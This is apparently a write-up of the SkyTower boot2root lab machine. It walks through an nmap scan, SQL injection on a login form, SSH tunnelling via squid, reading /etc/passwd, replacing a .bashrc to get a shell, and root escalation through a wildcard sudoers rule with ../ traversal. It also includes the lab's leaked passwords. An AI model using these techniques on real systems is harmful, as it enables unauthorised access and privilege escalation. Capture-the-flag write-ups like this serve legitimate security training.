Starting Nmap 6.46 ( http://nmap.org ) at 2014-06-28 23:18 EEST Nmap scan report for 192.168.74.134 Host is up (0.00075s latency). Not shown: 997 closed ports PORT STATE SERVICE 22/tcp filtered ssh 80/tcp open http 3128/tcp open squid-http
Let's examine the port 80:
Sql injection ??
Let's try to find out:
There was an error running the query [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1]
Post data of the malicious request.
For security reasons, you must login to the SkyTech server via SSH to access the account details. Username: john Email:[email protected] Password: hereisjohn
SSH port is filtered and squid is installed in the server. I added in the
~/.ssh/config file the following 2 lines:
Host 192.168.74.134 ProxyCommand corkscrew 192.168.74.134 3128 %h %p
So i am using corkscrew to have ssh connection over squid.
ssh [email protected]
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sat Jun 28 17:18:32 2014 from 192.168.74.134 Funds have been withdrawn Connection to 192.168.74.134 closed.
It logins normally but i don't have the time to execute a command. Then, i tried:
ssh [email protected] "cat /etc/passwd"
I found 2 more users in the passwd file:
john:x:1000:1000:john,,,:/home/john:/bin/bash sara:x:1001:1001:,,,:/home/sara:/bin/bash william:x:1002:1002:,,,:/home/william:/bin/bash
Now, i know the email format of the company([email protected]), i can try the other usernames to the first form.
In order to have shell, i should change the .bashrc file that closes the connection.
ssh [email protected] "mv /home/sara/.bashrc /home/sara/.bashrc_backup"
After logging in, i typed
sudo -l Matching Defaults entries for sara on this host: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User sara may run the following commands on this host: (root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*
The use of asterisks in sudoers file is dangerous as here.
sudo ls /accounts/../root/ flag.txt
sudo cat /accounts/../root/flag.txt Congratz, have a cold one to celebrate! root password is theskytower
AAnd we are root! It was an entry level boot2root but it has some unique 'features' like the use of squid.
Mysql credentials as a bonus:
cat /var/www/login.php | grep mysql $db = new mysqli('localhost', 'root', 'root', 'SkyTech');